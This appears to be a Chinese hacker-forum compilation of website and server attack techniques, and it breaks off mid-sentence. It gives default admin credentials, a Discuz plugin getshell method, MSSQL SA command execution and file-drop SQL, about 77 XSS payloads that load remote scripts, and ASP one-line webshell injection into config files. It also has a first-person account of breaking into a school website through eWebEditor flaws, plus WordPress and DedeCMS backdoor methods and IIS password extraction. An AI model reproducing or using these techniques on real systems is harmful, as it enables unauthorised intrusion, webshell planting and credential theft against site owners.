久久久电脑

管理登录：/system/adminlogin.asp
'管理帐号：admin
'密　　码：admin888
'
'网站数据：/Database/NwebCn_Site.mdb (常规内容数据库)
'　　　　　/Database/Bak_NwebCn_Site.mdb (备份内容数据库)
'　　　　　/Database/NwebCn_Stat.mdb (常规流量数据库)
'　　　　　/Database/Bak_NwebCn_Stat.mdb (备份流量数据库)
'常量配置：/Include/Const.asp (如果你更改过数据库存放路径或文件名，相应常量在此文件作修改)
拿shell看图

昨天碰到一个站后台将“常量配置”页面隐藏了，最后在官网下了一套程序调试，找出配置页为：system/setconst.asp，在后台直接输入就OK

discuz x1.5 discuz 7.2 后台getshell 0day通杀版

方法为：
后台：插件--添加插件--请选择导入方式:上传本帖附件中的XML文件 并同时勾选上 允许导入不同版本 Discuz! 的插件(易产生错误!!)
然后确认
shell地址就为：data/plugindata/shell.lang.php  (discuz x1.5 )
shell地址就为：data/plugin/data/shell.lang.php (discuz 7.2)

http://www.st999.cn/blog/tools/discuzshell.rar

附件: discuzshell.rar (470 bytes, 下载次数:169)

#Dis9 Team Users ==>admin

来源:http://www.t00ls.net 
以下方法都以需要SA权限为前提。 

1, 沙盒模式的变通. 


原始方法: 

第一句开启沙盘模式：exec master..xp_regwrite ’HKEY_LOCAL_MACHINE’,’SOFTWARE\Microsoft\Jet\4.0\Engines’,’SandBoxMode’,’REG_DWORD’,1 
复制代码第二句利用jet.oledb执行系统命令：select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\dnary.mdb’,’select shell("CMD命令")’)  
复制代码或select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=ias\ias.mdb’,’select shell("CMD命令")’)  
复制代码但是,当 X:\Windows\System32\ias\dnary.mdb 或 X:\Windows\System32\ias\ias.mdb 被删除时,命令就会无效了. 

所以利用以下语句创建一个数据库：(数据库名SysSetup.xml,后缀.xml是自定义,不影响使用.)declare @hr int 

declare @object int;declare @property int 

exec @hr = sp_OACreate ’ADOX.Catalog’,@object OUTPUT 

exec @hr = sp_OAMethod @object,’Create’,@property output,’Provider=Microsoft.Jet.OLEDB.4.0;Data Source=SysSetup.xml’ 
  

然后再利用jet.oledb调用SysSetup.xml执行系统命令：select * from openrowset(’microsoft.jet.oledb.4.0’,’;database=SysSetup.xml’,’select shell("CMD命令")’) 
  



2, 直接写入文件到对方计算机,此处的文件可以是exe, dll,等.(注,此方法不支持文件大于64KB) 

当已经有一个程序需要放到对方计算机的时候.(例如, 放MA。) 
将这个文件转成HEX代码。 
如果不知道怎么把文件转成HEX代码,请使用下面的工具. 
 File2Hex.rar (424 Bytes)   



使用方法很简单, 解压出来之后, 把要转的文件拖到脚本上去, 就会生成包含HEX代码的文本. 

然后用以下方法写入到对方计算机中。DECLARE @ObjectToken INT 

EXEC sp_OACreate ’ADODB.Stream’, @ObjectToken OUTPUT 

EXEC sp_OASetProperty @ObjectToken, ’Type’, 1 

EXEC sp_OAMethod @ObjectToken, ’Open’ 

EXEC sp_OAMethod @ObjectToken, ’Write’, NULL, 0x123456(其中0x123456为HEX内容) 



EXEC sp_OAMethod @ObjectToken, ’SaveToFile’, NULL, ’Test.exe(文件名)’, 2 

EXEC sp_OAMethod @ObjectToken, ’Close’ 

EXEC sp_OADestroy @ObjectToken 


  

写入之后, 就发挥你的办法去执行你写入的这个文件就OK了。 



集思广益： 
现在很多计算机可以执行命令的方法都被人封得抓狂,就算有幸可以执行,也有可能CMD被改了权限.. 
所以我推荐的办法是有能力的同学自己开发DLL,然后把DLL写入到对方计算机中,再注册为存储过程. 
至于存储过程的功能. 可以是下载程序并执行, 可以是直接执行命令. 当然这个看你自己了. 

Windows 下不能够以下面这些字样来命名文件/文件夹，包括：“aux”“com1”“com2”“prn”“con”和“nul”等，因为这些名字都属于设备名称，等价于一个 DOS 设备，如果我们把文件命名为这些名字，Windows 就会误以为发生重名，所以会提示“不能创建同名的文件”等等。 
当然，有一些特殊的方法可以偷机取巧，建立以这些设备名为名的文件夹，比如我们在命令提示符下执行“md C:\aux\\”，就在 C 盘建了一个名叫 aux 的文件夹。此文件夹虽然可以访问，也可以建立子文件夹，但却无法删除，因为 Windows 不允许以这种方式删除设备。在系统看来，这个 aux 文件夹就是设备。那么，如何删除这样的文件/文件夹呢？我们只要按照完整的 UNC 路径格式，就是网上邻居的路径格式，正确输入文件路径及文件名即可。比如要删除 C 盘下的 aux 文件夹，可在命令提示符下执行：rd /s \\.\C:\aux，rd 是命令提示符删除文件夹的命令，/s 参数表示从所有子目录删除指定文件。再比如要删除 C 盘 temp 文件夹下的 nul.exe 文件，在命令提示符下执行：del \\.\C:\temp\nul.exe 即可。

在Windows下无法以设备名来命名文件或文件夹，这些设备名主要有aux、com1、com2、prn、con、nul等，但Windows 2000/XP有个漏洞可以以设备名来命名文件或文件夹，让木马可以躲在那里而不被发现。

在服务器中 修改文件夹选项 – 查看 -隐藏受保护的操作系统文件[取消勾选] 即可查看此类文件属性均为RHSA系统文件且无法删除修改移动， 
那么如何彻底删除这些文件呢，首先打开运行cmd，输入以下命令
rmdir   \\.\D:\wwwroot\test\wwwroot   /s   /q 
注：D:\wwwroot\test\wwwroot 为你的网站所在目录（替换即可）；在执行以上命令前，将需要备份的网站程序移动到其他目录下； 
以上命令运行1-2次即可彻底删除这些文件；另请注意修补网站漏洞，一般为后门为 aux.asp;aux.jpg 上传漏洞。
这个方法比较土点，效果也有，但是站点运行总不能停止，另外方法就是通过工具来处理这类问题。
删除方法如下： 
第一步：进入服务器，打开工具>文件夹选项>查看>"隐藏受保护的操作系统文件(推荐)"，去掉其前边的钩,选中"显示所有文件和文件夹" 。

看木马文件的创建时间，通过搜索找出与其同时创建的文件。

第二步：下载Unlocker或者暴力删除文件工具，将这些文件删除。

方法三是最简单也是最方便的，通过命令删除：

del /f /a /q \\?\%1 
rd /s /q \\?\%1

把上面的命令保存为.bat后缀名称的文件，然后把不能删除的文件或者文件夹拖到bat文件上就可以。

经我的验证，第三种方法简单方便，也安全可靠，不容易出现误操作。

http://www.d99net.net/article.asp?id=389

(1)普通的XSS JavaScript注入
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(2)IMG标签XSS使用JavaScript命令
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>

(3)IMG标签无分号无引号
<IMG SRC=javascript:alert(‘XSS’)>

(4)IMG标签大小写不敏感
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>

(5)HTML编码(必须有分号)
<IMG SRC=javascript:alert(“XSS”)>

(6)修正缺陷IMG标签
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>

(7)formCharCode标签(计算器)
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>

(8)UTF-8的Unicode编码(计算器)
<IMG SRC=jav..省略..S')>

(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
<IMG SRC=jav..省略..S')>

(10)十六进制编码也是没有分号(计算器)
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>

(11)嵌入式标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(12)嵌入式编码标签,将Javascript分开
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(13)嵌入式换行符
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(14)嵌入式回车
<IMG SRC=”jav ascript:alert(‘XSS’);”>

(15)嵌入式多行注入JavaScript,这是XSS极端的例子
<IMG SRC=”javascript:alert(‘XSS‘)”>

(16)解决限制字符(要求同页面)
<script>z=’document.’</script>
<script>z=z+’write(“‘</script>
<script>z=z+’<script’</script>
<script>z=z+’ src=ht’</script>
<script>z=z+’tp://ww’</script>
<script>z=z+’w.shell’</script>
<script>z=z+’.net/1.’</script>
<script>z=z+’js></sc’</script>
<script>z=z+’ript>”)’</script>
<script>eval_r(z)</script>

(17)空字符
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out

(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out

(19)Spaces和meta前的IMG标签
<IMG SRC=”   javascript:alert(‘XSS’);”>

(20)Non-alpha-non-digit XSS
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

(21)Non-alpha-non-digit XSS to 2
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>

(22)Non-alpha-non-digit XSS to 3
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>

(23)双开括号
<<SCRIPT>alert(“XSS”);//<</SCRIPT>

(24)无结束脚本标记(仅火狐等浏览器)
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>

(25)无结束脚本标记2
<SCRIPT SRC=//3w.org/XSS/xss.js>

(26)半开的HTML/JavaScript XSS
<IMG SRC=”javascript:alert(‘XSS’)”

(27)双开角括号
<iframe src=http://3w.org/XSS.html <

(28)无单引号 双引号 分号
<SCRIPT>a=/XSS/
alert(a.source)</SCRIPT>

(29)换码过滤的JavaScript
\”;alert(‘XSS’);//

(30)结束Title标签
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>

(31)Input Image
<INPUT SRC=”javascript:alert(‘XSS’);”>

(32)BODY Image
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>

(33)BODY标签
<BODY(‘XSS’)>

(34)IMG Dynsrc
<IMG DYNSRC=”javascript:alert(‘XSS’)”>

(35)IMG Lowsrc
<IMG LOWSRC=”javascript:alert(‘XSS’)”>

(36)BGSOUND
<BGSOUND SRC=”javascript:alert(‘XSS’);”>

(37)STYLE sheet
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>

(38)远程样式表
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>

(39)List-style-image(列表式)
<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS

(40)IMG VBscript
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS

(41)META链接url
<META HTTP-EQUIV=”refresh” CONTENT=”0; URL=http://;URL=javascript:alert(‘XSS’);”>

(42)Iframe
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>

(43)Frame
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>

(44)Table
<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>

(45)TD
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>

(46)DIV background-image
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>

(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-8&13&12288&65279)
<DIV STYLE=”background-image: url(
javascript:alert(‘XSS’))”>

(48)DIV expression
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>

(49)STYLE属性分拆表达
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>

(50)匿名STYLE(组成:开角号和一个字母开头)
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>

(51)STYLE background-image
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A CLASS=XSS></A>

(52)IMG STYLE方式
exppression(alert(“XSS”))’>

(53)STYLE background
<STYLE><STYLE type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>

(54)BASE
<BASE HREF=”javascript:alert(‘XSS’);//”>

(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>

(56)在flash中使用ActionScrpt可以混进你XSS的代码
a=”get”;
b=”URL(\”";
c=”javascript:”;
d=”alert(‘XSS’);\”)”;
eval_r(a+b+c+d);

(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
<HTML xmlns:xss>
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
<xss:xss>XSS</xss:xss>
</HTML>

(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
<SCRIPT SRC=””></SCRIPT>

(59)IMG嵌入式命令,可执行任意命令
<IMG SRC=”http://www.XXX.com/a.php?a=b”>

(60)IMG嵌入式命令(a.jpg在同服务器)
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser

(61)绕符号过滤
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>

(62)
<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>

(63)
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>

(64)
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>

(65)
<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>

(66)
<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>

(67)
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”></SCRIPT>

(68)URL绕行
<A HREF=”http://127.0.0.1/”>XSS</A>

(69)URL编码
<A HREF=”http://3w.org”>XSS</A>

(70)IP十进制
<A HREF=”http://3232235521″>XSS</A>

(71)IP十六进制
<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>

(72)IP八进制
<A HREF=”http://0300.0250.0000.0001″>XSS</A>

(73)混合编码
<A HREF=”h
tt p://6 6.000146.0×7.147/”">XSS</A>

(74)节省[http:]
<A HREF=”//www.google.com/”>XSS</A>

(75)节省[www]
<A HREF=”http://google.com/”>XSS</A>

(76)绝对点绝对DNS
<A HREF=”http://www.google.com./”>XSS</A>

(77)javascript链接
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>

http://www.t00ls.net/viewthread.php?tid=13901

一句话插入配置文件system.asp

没有过滤双引号，插入一句就行。

常规插法如下：

"%><%eval request("d")%><%

但金刀客这篇文件（http://www.cqzh.cn/post/328.html）为什么说

"%><%eval request("d")%><%s="

必须要加s=呢？

比如：

web_name="中国纺织网"

插入后：

web_name="中国纺织网"%><%eval request("d")%><%"

跟这样不就全闭合了吗？

还需要<%s="干嘛？直接<%闭合下面的不就行了。

=========

":eval request(9)      //这多简单

=================

<%
webname="abc"
webhost="d:\abc\abc\www"
%>

插入"%><%eval request("d")%><%s="后就变成
<%
webname="abc"%><%eval request("d")%><%s=""
webhost="d:\abc\abc\www"
%>

============

test"%><%execute request("value")%><%a="test

来源 http://www.daokers.com/article/original/609.htm

昨日小刀刀在群里抛了一个问题，说后台插入一句话老是出错，群里的朋友出了很多主意，但是最后还是没搞定。后来这小子把问题抛给了我，昨天我就测试了一下。这里把情况介绍给大家。

一般而言，后台插一句话，如果数据库扩展名是asp的话，那么插数据库，但是如果有配置文件可以插的话，那肯定是插入配置文件了，但是插入配置文件有一个很大的风险，那就是一旦出错那么全盘皆输，有可能不仅仅造成后台无法登陆，甚至有可能是整个网站系统崩溃，所以插入配置文件，请慎之又慎。

话归正题，如果想插入配置文件，一般是config.asp，那么首先需要了解这个文件的一般情况。

网站的配置一般是保存网站名，地址，email之类的，既然是字符，那么格式应当是
webname=“test website”

对于这样的配置插入一句话的话，我们的机会就是替换test website，那么需要闭合2个"，同时要插入一句话，语句可以这样

"%><%eval request("d"%><%s="

那么在config.asp中就是

webname=“    "%><%eval request("d"%><%s="          ”


第一个"是闭合前面的配置文件中的"，%>就是闭合前一段脚本，之后插入一句话<%eval request("d"%>，现在要闭合原来的"和%>

所以加入<%s="，这里特别要注意“s=”，如果没有这个等号的话，那么就会成<%" ",这样必将出错。

好了，这是常规的办法，现在我们回到开始那个问题，按照前面的方法插入


插入后，我们再点击“网站设置” ，出现错误



从这个错误，我们可以得到2个信息。

第一，配置文件的路径：http://www.target.com/zfbm/zfb/inc/config.asp

第二，网站名的变量为webname。


昨天由于很晚了，就没继续看，今天出差，晚上回来刚刚上Q，小刀刀就q我，说拿下了，并说这个后台过滤了双引号"，结合昨天的错误一看果然是，由于我们闭合前面双引号起"的那个双引号收"被过滤成单引号'，所以就成了webname=" '，这样的话那么这个双引号没有闭合，由于双引号是vbscript的控制符，没有闭合config.asp运行必然出错。那么我们遇到这种双引号被过滤了的情况改怎么办呢。

由于插入一句话必须要用双引号括起来，而输入双引号又被过滤，所以我们可以利用他们自身的双引号来解决。

在配置文件中，我们还可以看到这样一些设置




就是配置网站的公告数 ，文章数等。可以假设一下，他必然是整数赋值，没有双引号包括
num=5
num是整数型，不然就成字符了num="5"

那么我们的一句话就可以这样构建，如图



在公告数中我们插入5%><%eval request(webname)%><%

必须要有5，不然将会出错，在网站名中我们插入"open"

由于我们没有输入双引号，不存在过滤，我们利用 配置文件本身的双引号来达到目的。那么配置文件现在的内容如下
<%
....................
webname="open"
num=5%><%eval request(webname)%><%
webnum=7
.......
%>

我们的一句话就相应为
eval request("open")，open为密码。

用菜刀成功连接


从上可见，我们成功利用配置文件本身避开了一句话中双引号被过滤的问题。

那么在网页设计方面，我们可以增加过滤<,%,>或者组合<%,%>这些特殊符号，禁止这些符号的输入，那么将大大增加网页安全。

by daokers  2010.4.28深夜于Canton

文章作者:yeshu

昨天很无聊，没事做就跑去检测同学学校的.

打开网站，找了下没找到..
-0看看有没有cookie注入也米用.都堵住了
图-1

找后台
http://www.xxxx.com/admin/admin_login.asp
试了下admin admin888
'or'='or'都没用
网上查了下这站也没有旁站
于是在看看网站图片属性
图-2

发现有ewebeditor
打开http://www.xxxx.com/admin/ewebeditor/admin_login.asp
图-3

发现后台被删了
在打开http://www.xxxx.com/admin/ewebeditor/db/ewebeditor.mdb
发现存在数据库，并下载
但打开数据库看后，没发现前辈留下的脚印
现在后台被删了，有没脚印于是想看看能否直接进后台样式
http://www.xxxx.com/admin/ewebeditor/admin_style.asp
图-4

直接进去了
但是我想直接在上面新增样式，却没用会跳转到admin_login.asp页面
图-5

郁闷了，不过想想既然可以直接这样输入地址进入样式管理项目，那试试可不可以直接输入上传文件管理的地方，这样就可以来遍历目录了
于是输入http://www.xxxx.com/admin/ewebeditor/admin_uploadfile.asp?id=22 成功进入
再继续来遍历目录了
http://www.xxxx.com/admin/ewebeditor/admin_uploadfile.asp?id=22&dir=../../..
图-6

继续遍历data目录
http://www.xxxx.com/admin/ewebeditor/admin_uploadfile.asp?id=22&dir=../../../data
（注意这里想遍历目录得自己手动在url上加上目录名才可以，若直接点网页上的链接浏览的话会直接跳转到admin_login.asp页面）
发现了数据库并下载得到后台账号密码
成功进入后台，但进后台后没发现可以利用的地方....遂放弃
再转战ewebeditor
继续看前面ewebedior是否还有利用的地方
前面在网页上点“添加样式”会跳到admin_login.asp,不知道为什么会这样？
然后就想先在自己电脑上的ewebeditor里面添加样式抓包，再把抓到的数据包改改地址给发送到目标网站上去，
结果测试nc提交后仍然会提示跳转到admin_login.asp

d_name=888&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=600&d_height=400&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=http%3A%2F%2FLocalhost%2FeWebEditor%2F&d_contentpath=UploadFile%2F&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casa&d_imagesize=100&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cbmp&d_remotesize=100&d_memo=&x=29&y=14

想不通了..
最后再想想前面这个遍历目录时非得在url后面添加才可以浏览，那不相当于利用get方法提交数据么，难道这只能利用get方法提交才不会跳转到admin_login.asp页面
于是想着直接利用在网站上url上添加数据提交来直接添加样式
但至于怎么url我也不清楚，只知道抓包得到的

这个是要传递的数据
于是自己在本机上乱来，测试呗，

结果发现直接

http://www.xxxx.com/admin/ewebeditor/action=StyleAddSave&id=88&d_name=888&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=600&d_height=400&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=http%3A%2F%2FLocalhost%2FeWebEditor%2F&d_contentpath=UploadFile%2F&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casa&d_imagesize=100&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cbmp&d_remotesize=100&d_memo=&x=29&y=14

这样就可以成功添加个样式，并且上传图片的格式可以是asa的。
图-7

但接下来又卡住了..
本来添加样式后就是添加栏了，
但自己在本机用同上的方法怎么测试，都不成功，郁闷了…
没办法了，但看看网站默认样式后面有个拷贝的选项
于是想着利用上面的方法拷贝个样式
然后再设置此样式里面的图片允许上传asa格式..,这样就好了，不用我自己来添加工具栏了
于是本机拷贝抓包发现提交http://www.xxxx.com/admin/ewebeditor/admin_style.asp?action=copy&id=14即可拷贝成功
图-8

再继续本机在拷贝得到的样式里面添加asa样式抓包获取提交数据
再构造url
http://www.xxxx.com/admin/ewebeditor/admin_style.asp?action=StyleSetSave&id=48&d_name=standard1&d_initmode=EDIT&d_uploadobject=0&d_autodir=0&d_dir=standard&d_css=office&d_width=550&d_height=350&d_stateflag=1&d_detectfromword=true&d_autoremote=1&d_showborder=0&d_baseurl=1&d_uploaddir=UploadFile%2F&d_basehref=&d_contentpath=&d_imageext=gif%7Cjpg%7Cjpeg%7Cbmp%7Casa&d_imagesize=100&d_flashext=swf&d_flashsize=100&d_mediaext=rm%7Cmp3%7Cwav%7Cmid%7Cmidi%7Cra%7Cavi%7Cmpg%7Cmpeg%7Casf%7Casx%7Cwma%7Cmov&d_mediasize=100&d_fileext=rar%7Czip%7Cexe%7Cdoc%7Cxls%7Cchm%7Chlp&d_filesize=500&d_remoteext=gif%7Cjpg%7Cjpeg%7Cbmp&d_remotesize=100&d_memo=Office%B1%EA%D7%BC%B7%E7%B8%F1%A3%AC%B2%BF%B7%D6%B3%A3%D3%C3%B0%B4%C5%A5%A3%AC%B1%EA%D7%BC%CA%CA%BA%CF%BD%E7%C3%E6%BF%ED%B6%C8%A3%AC%C4%AC%C8%CF%D1%F9%CA%BD&x=39&y=9

成功在样式图片里面添加了asa格式

再http://www.xxxx.com/admin/ewebedito/

admin_style.asp?action=stylepreview&id=53预览此样式
打开上传图片的地方却发现还是不能上传asa格式文件
晕了，后台里明明现实可以提交asa格式的..
难道做了这么多，全是在自慰，只能看不能用的。。
火了，再用此方法，在自己电脑上测试却发现能行的通呀…
……………..
再跑去网站上看看那样式预览的结果，
Tmd的看了十几篇突然发现个问题..
这里面的gifjpgjpegbmp后面多了个 ""
图-9 10

然后想到会不是会管理员给过滤了asp了，
于是速度跑去用上面方法添加cer格式看看，发现也这样，可能也被过滤了
继续添加asaspp样式，过滤后asp后就剩下asp了
ok终于成功了
图-11

成功上传小马
图-12

最后admin_style.asp?action=styledel&id=55删除刚刚创建的样式 ：注意后面的id得自己找对

dedecms 在禁止上传任何文件包括图片的时候 先把脚本木马成jpg然后传到另外一个站上 然后利用文章发布 直接填写上图片地址 提交 会自动把图片下载进服务器 然后利用更新首页 模板选择马的路径 更新为 .php 就是你的马。

WordPress3.0后台404页面可以自定义
“外观”-“编辑”-“404模板

插到文件头
点404模板的时候地址栏有相对路径，默认是wp-content\themes\twentyten\404.php
更新完直接访问localhost\wp-content\themes\twentyten\404.php就会在twentyten目录生成一句话后门a.php 密码a

cnbird提供的一个方法

==================

伟大娃娃的方法：

不是0day，只是之前用了一周的WP试着做博客来着。发现WP如果能进后台就可以直接拿SHELL的。
大牛说插入404文件，那个何必呢，动别人文件总归是不好，插挂了就悲剧了。
本机建立目录“wawa”,把一句话1.php放进去。打包wawa目录为zip文件。WP后台的主题管理，上传主题，安装。则你的后门路径为：
wp-content\themes\wawa\1.php
毫无技术含量，大牛不要拍我。

获取 IUSR 帐户密码
cscript.exe adsutil.vbs get w3svc/anonymoususerpass

获取 IWAM 帐户密码
cscript.exe adsutil.vbs get w3svc/wamuserpass

设置 IUSR 帐户密码
cscript.exe adsutil.vbs set w3svc/anonymoususerpass "password"

设置 IWAM 帐户密码
cscript.exe adsutil.vbs set w3svc/wamuserpass "password"
注：在获取密码的时候如果现实的结果密码为“******”，那么应当修改Adsutil.vbs文件
将